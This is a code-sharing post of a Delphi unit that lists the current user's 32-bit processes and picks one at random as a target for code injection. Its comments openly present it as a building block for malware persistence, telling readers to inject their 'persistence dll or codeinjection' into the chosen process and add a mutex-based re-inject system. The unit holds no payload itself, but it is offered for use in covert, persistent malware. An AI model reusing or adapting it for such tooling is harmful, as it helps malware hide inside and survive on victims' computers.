uGetProcess - Retrieve Injectable 32-bit Process

Submitted by:Jhon Brain

Date added:26 February, 2017

Category:Delphi

This Unit is Made by Snify and MindfreaK
Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )

Tags: ugetprocess , retrieve , injectable

Code Snippet:

{
This Unit is Made by Snify and MindfreaK together.
We went bored and searched for an x64 persistence method.
U can easily write your own x64 persistence with this ,
just write ur persistence dll or codeinjection and inject it
into an process u have found with GetInjectAbleProcess.

WARNING: Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )

- OpenSC.WS -

}
unit uGetProcess;

interface

uses SysUtils,TlHelp32,Windows;

function GetInjectAbleProcess() : Integer;

implementation

type
PTOKEN_USER = ^TOKEN_USER;
_TOKEN_USER = record
User: TSidAndAttributes;
end;
TOKEN_USER = _TOKEN_USER;

function GetUserAndDomainFromPID(ProcessId: DWORD;
var User, Domain: string): Boolean;
var
hToken: THandle;
cbBuf: Cardinal;
ptiUser: PTOKEN_USER;
snu: SID_NAME_USE;
ProcessHandle: THandle;
UserSize, DomainSize: DWORD;
bSuccess: Boolean;
begin
Result := False;
ProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId);
if ProcessHandle <> 0 then
begin
// EnableProcessPrivilege(ProcessHandle, 'SeSecurityPrivilege', True);
if OpenProcessToken(ProcessHandle, TOKEN_QUERY, hToken) then
begin
bSuccess := GetTokenInformation(hToken, TokenUser, nil, 0, cbBuf);
ptiUser := nil;
while (not bSuccess) and (GetLastError = ERROR_INSUFFICIENT_BUFFER) do
begin
ReallocMem(ptiUser, cbBuf);
bSuccess := GetTokenInformation(hToken, TokenUser, ptiUser, cbBuf, cbBuf);
end;
CloseHandle(hToken);

if not bSuccess then
begin
Exit;
end;

UserSize := 0;
DomainSize := 0;
LookupAccountSid(nil, ptiUser.User.Sid, nil, UserSize, nil, DomainSize, snu);
if (UserSize <> 0) and (DomainSize <> 0) then
begin
SetLength(User, UserSize);
SetLength(Domain, DomainSize);
if LookupAccountSid(nil, ptiUser.User.Sid, PChar(User), UserSize,
PChar(Domain), DomainSize, snu) then
begin
Result := True;
User := StrPas(PChar(User));
Domain := StrPas(PChar(Domain));
end;
end;

if bSuccess then
begin
FreeMem(ptiUser);
end;
end;
CloseHandle(ProcessHandle);
end;
end;


function IsWOW64: Boolean;
type
TIsWow64Process = function(Handle: THandle;var Res: BOOL): BOOL; stdcall;
var
IsWow64Result: BOOL;
IsWow64Process: TIsWow64Process;
begin
IsWow64Process := GetProcAddress(
GetModuleHandle('kernel32'), 'IsWow64Process'
);
if Assigned(IsWow64Process) then
begin
IsWow64Process(GetCurrentProcess, IsWow64Result);
Result := IsWow64Result;
end
else
Result := False;
end;

Function GetUserFromWindows: string;
Var
UserName : string;
UserNameLen : Dword;
Begin
UserNameLen := 255;
SetLength(userName, UserNameLen) ;
If GetUserName(PChar(UserName), UserNameLen) Then
Result := Copy(UserName,1,UserNameLen - 1)
Else
Result := 'Unknown';
End;

function GetInjectAbleProcess() : Integer; // 32 bit only
var
bProcess: boolean;
hProcess: THandle;
pe32Structur: TProcessEntry32;
sUser: string;
sDomain: string;
sWindowsUser: string;
TIsWow64Process : function( Handle: Windows.THandle; var Res: Windows.BOOL): Windows.BOOL; stdcall;
hOpen: THandle;
bIsWOW64: BOOL;
bError: boolean;
array_PID : array of integer;
pidcounter : Integer;
begin
pidcounter := 0;


sWindowsUser := GetUserFromWindows;
pe32Structur.dwSize:=Sizeof(TProcessEntry32);
hProcess :=CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);

If IsWow64 = true then
begin

TIsWow64Process := GetProcAddress(GetModuleHandle('kernel32'), 'IsWow64Process');
if Assigned(TIsWow64Process) then
begin
// Writeln ( 'API geladen.' )
end;
end;


if Process32first(hProcess,pe32structur) then
begin
//Writeln ( IntToStr (pe32Structur.th32ProcessID) );
repeat bProcess:=Process32Next(hProcess,pe32structur);
if GetCurrentProcessID <> pe32Structur.th32ProcessID then
begin
bError := false;
if bProcess = true then
begin
GetUserAndDomainFromPID(pe32Structur.th32ProcessID,sUser, sDomain);
if sWindowsUser = sUser then
begin
if IsWOW64 = true then //wenn 64
begin
//Writeln ('OpenProcess: '+IntToStr(pe32Structur.th32ProcessID));
hOpen := Windows.OpenProcess ( PROCESS_QUERY_INFORMATION , false , pe32Structur.th32ProcessID );
if hOpen = 0 then
begin
//Writeln ('OpenProcess gescheitert.');
bError := true;
end;

if bError = false then
begin


TIsWow64Process ( hOpen , bIsWOW64 );
CloseHandle ( hOpen );


if bIsWOW64 = false then
begin
// Writeln ( '64Bit: '+IntToStr(pe32Structur.th32ProcessID) )
end;

if bIsWOW64 = true then
begin
//Writeln ( {'32Bit: '+}IntToStr(pe32Structur.th32ProcessID) );
SetLength(array_PID, pidcounter+1);
array_PID[pidcounter] := pe32Structur.th32ProcessID;
inc(pidcounter);
end;
end;
end;


if ISWOW64 = false then //Wenn 32
begin
//Writeln ( IntToStr (pe32Structur.th32ProcessID) );
SetLength(array_PID, pidcounter+1);
array_PID[pidcounter] := pe32Structur.th32ProcessID;
inc(pidcounter);
end;
end;
end;
end;
until not bProcess;
end;
CloseHandle ( hProcess );

{$IFDEF Debug}
for pidcounter := 0 to Length(array_PID) -1 do begin
writeln ('INDEX['+inttostr(pidcounter)+'] ' + inttostr(array_PID[pidcounter]));
end;
{$ENDIF}

randomize;
result := array_PID[1 + random (Length(array_PID)-1)];


end;

end.
 
 

Comments